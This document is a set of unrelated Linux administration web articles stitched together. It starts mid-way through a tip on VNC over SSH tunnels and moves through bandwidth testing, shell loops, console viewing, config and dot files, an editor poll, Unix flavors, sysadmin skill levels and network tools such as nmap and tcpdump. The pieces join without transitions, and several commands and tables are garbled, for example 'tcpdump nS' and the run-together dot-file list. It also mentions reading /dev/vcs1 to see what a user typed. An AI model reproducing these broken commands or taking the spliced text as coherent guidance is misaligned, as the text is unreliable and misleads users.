The options tell the VNC server to start up with a resolution of 1024×768 and a pixel depth of 24 bits per pixel. If you are using a really slow connection setting, 8 may be a better option. Using :99 specifies the port the VNC server will be accessible from. The VNC protocol starts at 5900 so specifying :99 means the server is accessible from port 5999.

When you start the session, you’ll be asked to specify a password. The user ID will be the same user that you launched the VNC server from. (In our case, this is root.)
SSH from ginger to blackbox.example.com forwarding the port 5999 on blackbox to ginger. This is done from ginger by running the command:

root@ginger:~# ssh -R 5999:localhost:5999 thedude@blackbox.example.com

Once you run this command, you’ll need to keep this SSH session open in order to keep the port forwarded to ginger. At this point if you were on blackbox, you could now access the VNC session on ginger by just running:

thedude@blackbox:~$ vncviewer localhost:99

That would forward the port through SSH to ginger. But we’re interested in letting tech get VNC access to ginger. To accomplish this, you’ll need another tunnel.
From tech, you open a tunnel via SSH to forward your port 5999 to port 5999 on blackbox. This would be done by running:

root@tech:~# ssh -L 5999:localhost:5999 thedude@blackbox.example.com

This time the SSH flag we used was -L, which instead of pushing 5999 to blackbox, pulled from it. Once you are in on blackbox, you’ll need to leave this session open. Now you’re ready to VNC from tech!
From tech, VNC to ginger by running the command:

root@tech:~# vncviewer localhost:99 .

Tech will now have a VNC session directly to ginger.

While the effort might seem like a bit much to set up, it beats flying across the country to fix the storage arrays. Also, if you practice this a few times, it becomes quite easy.

Let me add a trick to this trick: If tech was running the Windows® operating system and didn’t have a command-line SSH client, then tech can run Putty. Putty can be set to forward SSH ports by looking in the options in the sidebar. If the port were 5902 instead of our example of 5999, then you would enter something like in Figure 5.

Figure 5. Putty can forward SSH ports for tunneling

If this were set up, then tech could VNC to localhost:2 just as if tech were running the Linux operating system.

Back to top

Trick 7: Checking your bandwidth

Imagine this: Company A has a storage server named ginger and it is being NFS-mounted by a client node named beckham. Company A has decided they really want to get more bandwidth out of ginger because they have lots of nodes they want to have NFS mount ginger’s shared filesystem.

The most common and cheapest way to do this is to bond two Gigabit ethernet NICs together. This is cheapest because usually you have an extra on-board NIC and an extra port on your switch somewhere.

So they do this. But now the question is: How much bandwidth do they really have?

Gigabit Ethernet has a theoretical limit of 128MBps. Where does that number come from? Well,

1Gb = 1024Mb; 1024Mb/8 = 128MB; “b” = “bits,” “B” = “bytes”

But what is it that we actually see, and what is a good way to measure it? One tool I suggest is iperf. You can grab iperf like this:

# wget http://dast.nlanr.net/Projects/Iperf2.0/iperf-2.0.2.tar.gz

You’ll need to install it on a shared filesystem that both ginger and beckham can see. or compile and install on both nodes. I’ll compile it in the home directory of the bob user that is viewable on both nodes:

tar zxvf iperf*gz
cd iperf-2.0.2
./configure -prefix=/home/bob/perf
make
make install

On ginger, run:

# /home/bob/perf/bin/iperf -s -f M

This machine will act as the server and print out performance speeds in MBps.

On the beckham node, run:

# /home/bob/perf/bin/iperf -c ginger -P 4 -f M -w 256k -t 60

You’ll see output in both screens telling you what the speed is. On a normal server with a Gigabit Ethernet adapter, you will probably see about 112MBps. This is normal as bandwidth is lost in the TCP stack and physical cables. By connecting two servers back-to-back, each with two bonded Ethernet cards, I got about 220MBps.

In reality, what you see with NFS on bonded networks is around 150-160MBps. Still, this gives you a good indication that your bandwidth is going to be about what you’d expect. If you see something much less, then you should check for a problem.

I recently ran into a case in which the bonding driver was used to bond two NICs that used different drivers. The performance was extremely poor, leading to about 20MBps in bandwidth, less than they would have gotten had they not bonded the Ethernet cards together!

Back to top

Trick 8: Command-line scripting and utilities

A Linux systems administrator becomes more efficient by using command-line scripting with authority. This includes crafting loops and knowing how to parse data using utilities like awk, grep, and sed. There are many cases where doing so takes fewer keystrokes and lessens the likelihood of user errors.

For example, suppose you need to generate a new /etc/hosts file for a Linux cluster that you are about to install. The long way would be to add IP addresses in vi or your favorite text editor. However, it can be done by taking the already existing /etc/hosts file and appending the following to it by running this on the command line:

# P=1; for i in $(seq -w 200); do echo “192.168.99.$P n$i”; P=$(expr $P + 1);
done >>/etc/hosts

Two hundred host names, n001 through n200, will then be created with IP addresses 192.168.99.1 through 192.168.99.200. Populating a file like this by hand runs the risk of inadvertently creating duplicate IP addresses or host names, so this is a good example of using the built-in command line to eliminate user errors. Please note that this is done in the bash shell, the default in most Linux distributions.

As another example, let’s suppose you want to check that the memory size is the same in each of the compute nodes in the Linux cluster. In most cases of this sort, having a distributed or parallel shell would be the best practice, but for the sake of illustration, here’s a way to do this using SSH.

Assume the SSH is set up to authenticate without a password. Then run:

# for num in $(seq -w 200); do ssh n$num free -tm | grep Mem | awk ‘{print $2}’;
done | sort | uniq

A command line like this looks pretty terse. (It can be worse if you put regular expressions in it.) Let’s pick it apart and uncover the mystery.

First you’re doing a loop through 001-200. This padding with 0s in the front is done with the -w option to the seq command. Then you substitute the num variable to create the host you’re going to SSH to. Once you have the target host, give the command to it. In this case, it’s:

free -m | grep Mem | awk ‘{print $2}’

That command says to:
Use the free command to get the memory size in megabytes.
Take the output of that command and use grep to get the line that has the string Mem in it.
Take that line and use awk to print the second field, which is the total memory in the node.

This operation is performed on every node.

Once you have performed the command on every node, the entire output of all 200 nodes is piped (|d) to the sort command so that all the memory values are sorted.

Finally, you eliminate duplicates with the uniq command. This command will result in one of the following cases:
If all the nodes, n001-n200, have the same memory size, then only one number will be displayed. This is the size of memory as seen by each operating system.
If node memory size is different, you will see several memory size values.
Finally, if the SSH failed on a certain node, then you may see some error messages.

This command isn’t perfect. If you find that a value of memory is different than what you expect, you won’t know on which node it was or how many nodes there were. Another command may need to be issued for that.

What this trick does give you, though, is a fast way to check for something and quickly learn if something is wrong. This is it’s real value: Speed to do a quick-and-dirty check.

Back to top

Trick 9: Spying on the console

Some software prints error messages to the console that may not necessarily show up on your SSH session. Using the vcs devices can let you examine these. From within an SSH session, run the following command on a remote server: # cat /dev/vcs1. This will show you what is on the first console. You can also look at the other virtual terminals using 2, 3, etc. If a user is typing on the remote system, you’ll be able to see what he typed.

In most data farms, using a remote terminal server, KVM, or even Serial Over LAN is the best way to view this information; it also provides the additional benefit of out-of-band viewing capabilities. Using the vcs device provides a fast in-band method that may be able to save you some time from going to the machine room and looking at the console.

Back to top

Trick 10: Random system information collection

In Trick 8, you saw an example of using the command line to get information about the total memory in the system. In this trick, I’ll offer up a few other methods to collect important information from the system you may need to verify, troubleshoot, or give to remote support.

First, let’s gather information about the processor. This is easily done as follows:

# cat /proc/cpuinfo .

This command gives you information on the processor speed, quantity, and model. Using grep in many cases can give you the desired value.

A check that I do quite often is to ascertain the quantity of processors on the system. So, if I have purchased a dual processor quad-core server, I can run:

# cat /proc/cpuinfo | grep processor | wc -l .

I would then expect to see 8 as the value. If I don’t, I call up the vendor and tell them to send me another processor.

Another piece of information I may require is disk information. This can be gotten with the df command. I usually add the -h flag so that I can see the output in gigabytes or megabytes. # df -h also shows how the disk was partitioned.

And to end the list, here’s a way to look at the firmware of your system—a method to get the BIOS level and the firmware on the NIC.

To check the BIOS version, you can run the dmidecode command. Unfortunately, you can’t easily grep for the information, so piping it is a less efficient way to do this. On my Lenovo T61 laptop, the output looks like this:

#dmidecode | less
…
BIOS Information
Vendor: LENOVO
Version: 7LET52WW (1.22 )
Release Date: 08/27/2007
…

This is much more efficient than rebooting your machine and looking at the POST output.

To examine the driver and firmware versions of your Ethernet adapter, run ethtool:

# ethtool -i eth0
driver: e1000
version: 7.3.20-k2-NAPI
firmware-version: 0.3-0

Introduction

Every Linux program is an executable file holding the list of opcodes the CPU executes to accomplish specific operations. For instance, the ls command is provided by the file /bin/ls, which holds the list of machine instructions needed to display the list of files in the current directory onto the screen.
The behaviour of almost every program can be customized to your preferences or needs by modifying its configuration files.

Is there a standard configuration file format in Linux?

In a word, no. Users who are new to Linux (rightly) feel frustrated that each configuration file looks like a new challenge to figure out. In Linux each programmer is free to choose the configuration file format he or she prefers. Format options range from the /etc/shells file, which contains a list of possible shells separated by a newline, to Apache’s complex /etc/httpd.conf file.

What are system configuration files?

The kernel itself may be considered a “program.” Why does the kernel need configuration files? The kernel needs to know the list of users and groups in the system, and manage file permissions (that is, determine if a file can be opened by a specific user, according to the permissions, UNIX_USERS). Note that these files are not specifically read by programs, but by a function provided by a system library, and used by the kernel. For instance, a program needing the (encrypted) password of a user should not open the /etc/passwd file. Instead, it should call the system library function getpw(). This kind of function is also known as a system call. It is up to the kernel (through the system library) to open the /etc/passwd file and after that, search for the password of the requested user.

Most of the configuration files in the Red Hat Linux system are in the /etc directory unless otherwise specified. The configuration files can be broadly classified into the following categories:

Access files

Booting and login/logout

File system

The kernel provides an interface to display some of its data structures that can be useful for determining the system parameters like interrupts used, devices initialised, memory statistics, etc. This interface is provided as a separate but dummy filesystem known as the /proc filesystem. Many system utilities use the values present in this filesystemf or displaying the system statistics. For example, the file /proc/modules lists the currently loaded modules in the system. This information is read by the command lsmod, which then displays it in a human readable format.
In the same way, the file mtab specified in the following table reads the /proc/mount file, which contains the currently mounted filesystems.

System administration

Networking

System commands

System commands are meant exclusively to control the system, and make everything work properly. All the programs like login (performing the authentication phase of a user on the console) or bash (providing the interaction between a user and the computer) are system commands. The files associated with them are therefore particularly important. This category has the following files of interest to users and administrators.

Back to top

Daemons

A daemon is a program running in non-interactive mode. Typically, daemon tasks are related to the networking area: they wait for connections, so that they can provide services through them. Many daemons are available for Linux, ranging from Web servers to ftp servers.

User programs

In Linux (and UNIX in general), there are countless “user” programs. A most common user program config file is /etc/lynx.cfg. This is the configuration file for lynx, the well-known textual browser. Through this file you can define the proxy server, the character set to use, and so on.
The following code sample shows a part of the lynx.cfg file that can be modified to change the proxy settings of the Linux system. These settings apply (by default) to all the users running lynx in their respective shells, unless a user overrides the default config file by specifying --cfg = "mylynx.cfg.

Proxy settings in /etc/lynx.cfg

.h1 proxy
.h2 HTTP_PROXY
.h2 HTTPS_PROXY
.h2 FTP_PROXY
.h2 GOPHER_PROXY
.h2 NEWS_PROXY
.h2 NNTP_PROXY
# Lynx version 2.2 and beyond supports the use of proxy servers that can act as
# firewall gateways and caching servers. They are preferable to the older
# gateway servers. Each protocol used by Lynx can be mapped separately using
# PROTOCOL_proxy environment variables (see Lynx Users Guide). If you have 
# not set them externally, you can set them at run time via this configuration file.
# They will not override external settings. The no_proxy variable can be used
# to inhibit proxying to selected regions of the Web (see below). Note that on
# VMS these proxy variables are set as process logicals rather than symbols, to
# preserve lowercasing, and will outlive the Lynx image.
#
.ex 15
http_proxy:http://proxy3.in.ibm.com:80/
ftp_proxy:http://proxy3.in.ibm.com:80/
#http_proxy:http://penguin.in.ibm.com:8080
#ftp_proxy:http://penguin.in.ibm.com:8080/.h2 NO_PROXY
# The no_proxy variable can be a comma-separated list of strings defining
# no-proxy zones in the DNS domain name space.  If a tail substring of the
# domain-path for a host matches one of these strings, transactions with that
# node will not be proxied.
.ex
no_proxy:demiurge.in.ibm.com, demiurge

Changing configuration files

When changing a configuration file, make sure that the program using that configuration is restarted if it’s not controlled by the system administrator or the kernel. A normal user doesn’t usually have privileges to start or stop system programs and/or daemons.

The kernel

Changing configuration files in the kernel immediately affects the system. For example, changing the passwd file to add a user immediately enables that user. Also there are some kernel tunable parameters in the /proc/sys directory on any Linux system. The write-access to all these files is given only to the super-user; other users have only readonly access. The files in this directory are classified in the same manner as the Linux kernel source. Every file in this directory represents a kernel data structure that can be dynamically modified to change the system performance.

Note: Before changing any value in any of these files, make sure you know everything about the file to avoid irreparable damage to the system.
Files in the /proc/sys/kernel/ directory

Daemons and system programs

A daemon is a program that is always running in background, quietly carrying out its task. Common ones are in.ftpd (ftp server daemon), in.telnetd (telnet server daemon), and syslogd (system logging daemon).
Some daemons, while running, keep a close watch on the configuration file and reload it automatically when it changes. But most of the daemons do not reload automatically. We need to “tell” them somehow that the configuration file has changed and that it should be reloaded. This can be achieved (on Red Hat Linux systems) by restarting the services using the service command.

For example, if we have changed the network configuration, we need to issue:

service network restart.

Note: The services are most commonly the scripts present in the /etc/rc.d/init.d/* directory and are started by the init when the system is booted. So, to restart the service you can also do the following:

/etc/rc.d/init.d/<script-for-the-service> start | stop | status
start, stop, and status are the values that these scripts take as input to perform the action.

User programs

A user or system program reads its configuration file every time it is launched. Remember, though, that some system programs are spawned when the computer is turned on, and their behaviour depends on what they read in the configuration files in /etc/. So, the first time a user program is started, the default configuration is read from the files present in the /etc/ directory. Later, the user can customise the programs by using rc and . (dot) files as explained in the next section.

User configuration files: . (dot) files and rc files

We have seen how programs can be easily configured. But what if someone does not like the way a program has been configured in /etc/? A “normal” user cannot simply go into /etc and change the configuration files; they are owned — from the filesystem’s point of view — by root! This is why most user programs define two configuration files: the first one at a “system” level, located in /etc/; and the other one, “private” to the user, that can be found in his or her home directory.

For example, in my system I have installed the very useful wget utility. In /etc/ there is an /etc/wgetrc file. In my home directory, there is a file named .wgetrc, which describes my customised configuration (which will be loaded only when I, the user run the wget command). Other users may also have the .wgetrc file in their home directory (/home/other); this file will be read, of course, only when the user runs the wget command. In other words, the /etc/wgetrc file provides “default” values for wget, while the /home/xxx/.wgetrc file lists the “customisations” for a certain user. It is important to understand that this is the “general rule,” and is not necessarily true for all cases. A program like pine, for instance, does not have any files in /etc/, but only the custom configuration in the users’ home directory, in a file named .pinerc. Other programs may only have a default configuration file in /etc/, and may not let users “customize” them (it’s the case with only a few of the config. files in the /etc dir.).

Commonly used rc and . (dot) files

If this contains an e-mail address, then all mail to owner of ~ will be forwarded to that e-mail address.~/.fvwmrc ~/.fvwm2rcConfig files for fvwm and fvwm2 (the basic X Window manager).~/.hushloginLook at “man login”. Causes a “quiet” login (no mail notice, last login info,
or MOD).~/.mail.rcUser init file for mail program.~/.ncftp/Directory for ncftp program; contains bookmarks, log, macros, preferences, trace. See man ncftp.
The purpose of ncftp is to provide a powerful
and flexible interface to the Internet standard File Transfer Protocol. It is intended to replace the
stock ftp program that comes with the system.~/.profileLook at “man bash”. Treated by bash like ~/.bash_profile if that and ~/.bash_login don’t
exist, and used by other Bourn-heritage shells too.~/.pinercPine configuration~/.muttrcMutt configuration~/.exrcConfiguration of vi can be controlled by this file.

Example: set ai sm ruler

Writing the above line in this file makes vi set the auto-indentation,
matching brackets and displaying line number and rows-columns options.~/.vimrcDefault “Vim” configuration file. Same as .exrc.~/.gtkrcGNOME Toolkit.~/.kdercKDE configuration.~/.netrcDefault login names and passwords for ftp.~/.rhostsUsed by the r-tools: rsh, rlogin, etc. Very
weak security since host impersonation is easy.

1. Must be owned by user (owner of ~/) or superuser.
2. Lists hosts from which users may access this account.
3. Ignored if it is a symbolic link.

~/.rpmrcSee “man rpm”. Read by rpm if /etc/rpmrc is not present.~/.signatureMessage text that will be appended automatically to the mail sent
from this account.~/.twmrcConfig file for twm (The Window Manager).~/.xinitrcRead by X at startup (not by xinit script). Mostly starts some progs.

Example: exec /usr/sbin/startkde

If the above line is present in this file, then the KDE Window Manager is
started in when the startx command is issued from this account.~/.xmodmaprcThis file is passed to the xmodmap program, and could be named anything (~/.Xmodmap and ~/.keymap.km, for example).~/.xserverrcRun by xinit as the X server if it can find X to execute.~/News/Sent-Message-IDsDefault mail history file for gnus.~/.XauthorityRead and written by xdm program to handle authorization. See the X, xdm, and xauth man pages.~/.Xdefaults,

~/.Xdefaults-hostnameRead by X applications during startup on hostname. If the -hostname
file can’t be found, .Xdefaults is looked for.~/.XmodmapPoints to .xmodmaprc; Red Hat had (has) .xinitrc using this name.~/.XresourcesUsually the name for the file passed to xrdb to load the X resources
database, to avoid the need for applications to read a long .Xdefaults
file. (~/.Xres has been used by some.)~/mboxUser’s old mail.

Vim won by a huge margin and I don’t think this is surprise to anybody. If you are new to any of the Linux text editors listed in the top 5, read the rest of the article to understand little bit more about those editors.

                                       Favorite Linux Text Editor Voting Results

1. Vim Editor

Home Page: http://www.vim.org/
Author: Bram Moolenaar
Latest Stable Version: Vim 7.2
Written in: C and Vim script
Operating System: Cross-platform (Unix, Linux and Windows)
Read more about Vim Editor at Wikipedia

 

2. gEdit Editor

gedit is the default text editor for the GNOME desktop environment. This is a UTF-8 compatible text editor.
Home Page: http://projects.gnome.org/gedit/
Latest Stable Release: 2.26.2
Written in: C, Python
Operating System: Cross-platform

 

  3. Nano Editor

   

Home Page: http://www.nano-editor.org/
Latest Stable Release: 2.0.9
Read more about Nano editor
Read more about gEdit at Wikipedia

 

4. gVim Editor

Home Page: http://vimdoc.sourceforge.net/htmldoc/gui.html
gVim is the graphical version of the famous Vim editor

 

5. Emacs Editor

Home Page: http://www.gnu.org/software/emacs/
Current Stable Release: 22.3
First Release of Emacs was in the year 1976
Written in C and Emacs lisp
Operating System: Cross-platform
Read more about Emacs Editor at Wikipedia

It seemed a simple enough topic, or so this web hosting novice thought. So I went through countless of sites in search of the answer and came up with a list of Web Hosting Operating Systems to choose from. Whereupon I concluded that there really wasn’t a system that would prove ‘best’ for all. It was, for the most part, simply a matter of needs, and of course, of preference, both from the web host’s and the web master’s points of view.

That takes care of that! Right? Well, not quite. I realized, in the course of my research, that from this list, another ‘list’ begged to be made. A list, that seemed necessary if one were to make an informed choice when it comes to operating systems.

This list, of course, is that of the many Unix ‘flavors’ available in the market. Unless you’re an expert, or simply a fanatic, chances are the concept of Unix having ‘flavors’ came as a surprise. Who knew flavors could apply to things other than ice cream, or food for that matter?

So what exactly is a Unix flavor?

this blog  defines it as an implementation of Unix, with each flavor, designed to work with different types of hardware, and having its own unique commands or features. The UGU site provides one of the more comprehensive lists of Unix flavors, but for those who don’t feel like going though all those links, below is an overview of the more popular ones.

Flavors that are available commercially (read: sold) include:

Solaris – Sun Microsystems’ implementation, of which there are different kinds available: these are Solaris OS for SPARC platforms, Solaris OS for x86 platforms, and Trusted Solaris for both SPARC & x86 platforms; the latest version is Solaris 10 OS

AIX – short for Advanced Interactive eXecutive; IBM’s implementation, the latest release of which, is the AIX 5L version 5.2.

SCO UnixWare and OpenServer – are implementations derived from the original AT&T Unix® source code acquired by the Santa Cruz Operation Inc. from Novell, and later on bought by Caldera Systems; the latest versions are UnixWare 7.1.3 and OpenServer 5.0.7

BSD/OS – the Berkeley Software Distribution (BSD) Unix implementation from Wind River; its latest version is the BSD/OS 5.1 Internet Server Edition

IRIX – the proprietary version of Unix from Silicon Graphics Inc.; the latest release of which is IRIX 6.5

HP-UX – short for Hewlett-Packard UniX; the latest version is the HP-UX 11i

Tru64 UNIX – the Unix operating environment for HP AlphaServer systems; Tru64 UNIX v5.1B-1 is the latest version

Mac OS – Mac operating system from Apple Computer Inc. having a Unix core; the latest version is the Mac OS X Panther

Flavors that are available for free, include:

FreeBSD – derived from BSD, it is an advanced OS for x86 compatible AMD64, Alpha, IA-64, PC-98 and UltraSPARC® architectures; the latest versions are FreeBSD 5.2.1 (New Technology Release) and the FreeBSD 4.9 (Production Release)

NetBSD – Unix-like OS derived from BSD and developed by The NetBSD Project; it is shipped under a BSD license and the latest release is NetBSD 1.6.2

OpenBSD – multi-platform 4.4BSD-based Unix-like OS from The OpenBSD project; its latest release is OpenBSD 3.4

Linux — a Unix-type OS originally created by Linus Torvalds, the source code of which is available freely and open for development under GNU General Public License; there are numerous Linux distributions available

A more detailed discussion of these flavors will be provided in future postings, so do come back soon.

NOTES:

Free in this case means that the software is free (to use), but does not necessarily mean that users won’t shell out money to get their own copy(ies). Suppliers may charge a nominal fee for materials used to copy/distribute these (i.e. CDs) and for shipping (if applicable).

BSD license simply put means that users are allowed to develop products based on NetBSD without the changes having to be made public

Although Linux has traditionally been freely available, the ongoing case by SCO against IBM and the rest of the Linux community might change this. A more detailed posting will be made on this topic in the coming days.

System Administration Skills:

System administration skills can be classified in four general levels. The links below discuss the required skills, desired skills, and responsibilities of each of those levels. Following the levels are some general thoughts on system administration in general.
Novice     Junior     Intermediate/advanced Senior 

Novice System Administrator:

* Required skills:
@ Has strong inter-personal and communication skills: is capable of explaining simple procedures in writing or verbally; has good phone skills.
@ Is familiar with Unix and its commands/utilities at the user level. Can edit files using more than one editor. Uses at least two shells one of them being the Bourne shell.
@ Can perform standard file processing tasks; find, move, remove, redirection.

* Required background:
@ Two years of college or equivalent post-high school education or experience.

* Desirable:
@A degree or certificat in computer science or related field.
@ Previous experience in customer support, computer operations, system administration, or another related area.
@ Motivated to advance in the profession.

* Appropriate responsibilities:
@ Perform routine tasks under the direct supervision of a more experienced administrator.
@ Be the front-line interface for users; accepting problem reports and passing them to the appropriate system administrators.
@ Performs some security functions, especially monitoring the system

Junior System Administrator:

* Required skills:
@Has strong inter-personal and communication skills: capable of training users in applications and Unix fundamentals. Able to write basic system and user documentation.
@ High skill level with most Unix commands and utilities.
@ Familiar with most basic system administration tools and tasks. For example, can cleanly boot and shutdown the system, add and remove user accounts, use backup programs, perform fsck and maintain system database files (groups, hosts, aliases, etc.)
@ Fundamental understanding of the functioning of the Unix operating system: for example understands job control, hard and soft linking, the difference between shell programs and kernel programs.
@ Basic understanding of Unix security procedures

* Required background:
@ One to three years of system administration experience.

* Desirable:
@ Degree in CS or a related field.
@ Familiarity with networked/ distributed computing environments. For example: can use the route command, add a workstation to a network, or mount a remote filesystem.
@ Ability to write functional scripts in an administrative language (shell, Perl, Tk).
@ Some programming experience in an applicable language like C.

* Appropriate Responsibilities:
@ Administer a small site alone, or assist in the administration of a larger site.
@ Work under the general supervision of a more senior system administrator or computer systems manager.
@ Perform normal security procedures, able to advise users on standard security protocol.

Intermediate/Advanced System Administrator

* Required Skills
@ Has strong inter-personal and communication skills: capable of training users in complex topics, making presentations to internal groups. Able to write intricate system and user documentation. Capable of writing and explaining purchase justifications.
@ Independent problem solving; self-directed, self-starting.
@ Very comfortable with most aspects of the Unix operating system: paging/swapping, inter-process communication, devices and device driver fundamentals, file system concepts like inode and superblock.
@ Familiar with fundamental networking/distributed computing environments and concepts. Can configure NFS and NIS, use nslookup or research to check information in the DNS.
@ Ability to write detailed scripts in at least one, preferably two administrative lnaguages, (shell scripts, Perl, Tk).
@ Ability to perform at least minimal debugging and modification of C programs.
@ Ability to perform most security audits, and protect the system against intrusion.

* Required Background:
@ Three to five years of system administration experience.

* Desirable:
@ At least a BS in Computer Science or a related field.
@ Significant programming background in any applicable language.

* Appropriate Responsibilities:
@ Receive general instructions for new duties from supervisor.
@ Administers a mid-size site alone, or assists in administration of a larger site.
@ Initiates some new responsibilities and helps plan for the future of the site and network.
@ Manages novice system administrators or operators.
@ Evaluates and/or recommends purchases; has strong influence on the purchasing process.
@ Serves as the first line of defense against intrusion and inadvertent system damage.

Senior System Administrator:

* Required Skills
@ Strong inter-personal and communication skills; capable of writing proposals and papers, acting as a vendor liaison, making presentations to customer/client audiences or making professional presentations, work closely with upper management.
@ Ability to solve problems quickly and completely.
@ Ability to identify tasks which should be automated and then write tools to automate them.
@ Solid understanding of the Unix based operations system: understands paging and swapping, interprocess communication, devices and device drivers, can perform system analysis and tuning.
@ Ability to program in at least one, preferably two administrative languages, (shell, Perl, Tk) and port C programs from one platform to another, write small C programs.
@ Solid understanding of networking/distributed computing environments, understanding the principals of routing, client/server programming, and the design of consistent network-wide filesystems.

* Required Background:
@ More than 5 years of previous system administration experience.

* Desirable:
@ A degree in CS or a related field. Advanced degree preferred.
@ Extensive programming experience in an applicable language.
@ Publications within the field of system administration.

* Appropriate Responsibilities:
@ Design/implement complex local and wide-area networks of machines.
@ Manages a large site or network.
@ Works under general direction of senior management.
@ Establishes/recommends policies and procedures for system use and services.
@ Provides the technical lead and/or supervision for system administrators, system programmers, or others.
@ Has purchasing authority and responsibility for purchase justification.

Finally, some important thoughts for system Administrators:
-> Never do something you can’t undo.
-> Always check the backups, never assume they are working. Make sure you can restore from them, too.
->Write down what you did, even if you know you will never forget it, you will.
-> If you do it more than once, write a script.
-> Get to know your users before there is a problem, then when there is, they will know who you are and maybe have a little understanding.
-> Remember you are performing a service for your users, you don’t own the system, you just get to play with it.
-> Check your backups.
-> Never stop learning, there is always something you should know to make your job easier and your system more stable and secure.
-> Check your backups, again.

Linux networking monitoring tools work on all networks– Linux, BSD, Mac, Unix, and Windows.
Monitoring traffic on your network is only as important as the data and computers you want to protect. Understanding how to do basic network troubleshooting will save you both in wasted time and money. Every Linux operating system comes with a number of command line tools to help you diagnose a network problem. In addition, there are any number of open source tools available to help you track down pesky network issues.

Knowing a few simple commands and when to use them will help you get started as a network diagnostic technician. We’ll use Ubuntu 10.04 desktop as our test platform, although all of these work in other distros as well.

Good Old Ping

If you’re uncomfortable using the Linux command line from a terminal, you might as well stop reading at this point or at least skip to the other applications. In reality, there’s nothing to be afraid of when it comes to the Linux command line, especially when it comes to diagnosing a network problem. Most commands simply display information that can help you determine what’s happening. Some will require root permissions or at least the ability to issue the sudo command.

First and foremost is the ifconfig command. Typing this at a command prompt will display information about all known network devices. In the example below you can see eth0, lo and wlan0. These correspond to a wired Ethernet device (assigned address 192.168.1.2), the lo or loopback connection, and a wireless Ethernet device (address 192.168.1.102). It also shows the mac address of the device (HWaddr) and some statistics about the traffic. This should be your first command if you’re having network troubles to see if you have a valid IP address and if you see any traffic counts or errors.

The ping command should be your second tool of choice to determine if your computer is communicating with the outside world. Issuing a ping command to a known address (like 4.2.2.1) will quickly show if you have connectivity or not. It will also show you the time it took for the ping command to complete. Typical ping times for a DSL-type connection should be somewhere around 50 ms.

After the first two you should probably use the route command. This will show a list of IP addresses including the Destination and Gateway addresses connected to each interface along with some additional information including a Flags column. This column will have the letter G on the line associated with your default gateway. You can use this address in a ping command to determine if your machine has connectivity with the gateway.

EtherApe

EtherApe is available for download from the Ubuntu Software Center. It uses GNOME and libpcap to present a graphical map of all network traffic seen by the selected interface. After installation you should see the EtherApe icon under the Applications / System Tools menu. When we ran it this way, it wasn’t able to open any of the network devices as this requires root access. We were able to get it to run from the command line using sudo as follows:

$ sudo etherape

Once you have the program running it should start displaying a graphical representation of the traffic seen on the default Ethernet interface. You can select a specific device if your computer has multiple Ethernet interfaces using the Capture / Interfaces menu. EtherApe also has the ability to view data from a saved pcap file and show traffic by protocol.

Nmap

Nmap is a widely used security scanner tool originally released in 1997. It uses a variety of special packets to probe a network for any number of purposes including creating an IP map of addresses, determining the operating system of a specific target IP address and probing a range of IP ports at a specific address. One of the most basic issues is to do what’s called a ping sweep, meaning a series of ping commands to determine what addresses have computers attached to them. This can be accomplished with the following command:

$ nmap -sP 192.168.1.1-255

There are a number of graphical applications available from the Ubuntu Software Center that use nmap as the engine and then display the results in a more user-friendly way. These include NmapSI4, which uses a Qt4 interface, and Zenmap.

Tcpdump

Capturing network traffic for further analysis is the primary function of tcpdump. Actually, the packet capturing is accomplished by libpcap while the actual presentation and analysis is done with tcpdump. Raw Ethernet data is stored in the pcap file format for further examination. This same file format is used by other packet analysis tools such as Wireshark.
Email Article
Print Article
Share Articles

A typical tcpdump command to capture basic traffic would be:

$ sudo tcpdump nS

The sudo is required to gain access to the default Ethernet device. This command will display basic information including time, source and destination addresses and packet type. It will continue displaying information in the terminal until you press control-C. Tcpdump is the best and fastest way to capture network traffic to a file. A typical command to accomplish this would be:

$ sudo tcpdump s w pktfile.pcap

Wireshark

Wireshark, formerly known as Ethereal, has become the tool of choice for many, if not most, network professionals. (Ubuntu users will find it in the Ubuntu Software Center under the Internet tab.) As with some of the other tools, we had to launch Wireshark from the command line using sudo to get it to see the available Ethernet devices. Once launched you should see a list of available interfaces on the left-hand side of the main window. Selecting one of the available interfaces or the virtual interface that collects packets from all Ethernet devices will bring up the protocol display page.

Wireshark provides a wealth of information about the captured traffic along with tools to filter and display based on any number of criteria including source or destination address, protocol, or error status. The Wireshark homepage has links to video tutorials, white papers and sample data to help get you started in network sleuthing.

Linux is an ideal platform to learn network troubleshooting techniques. It offers a wide array of command line and GUI tools to analyze and visualize your network traffic.